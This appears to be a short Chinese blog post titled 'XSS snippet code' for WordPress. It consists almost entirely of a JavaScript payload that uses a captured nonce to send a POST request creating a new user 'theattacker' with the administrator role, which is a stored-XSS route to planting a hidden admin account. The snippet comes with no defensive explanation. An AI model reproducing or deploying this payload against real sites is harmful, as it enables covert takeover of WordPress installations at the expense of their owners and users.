XSS片段代码

XSS片段代码 1Wordpress
这篇文章约1分阅读完。

var params = "action=createuser&_wpnonce_create-user="+nonce+"&user_login=theattacker&[email protected]&pass1=attackpass&pass2=attackpass&role=administrator";
ajaxRequest = new XMLHttpRequest();
ajaxRequest.open("POST", requestURL, true);
ajaxRequest.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
ajaxRequest.send(params);

评论

复制标题和 URL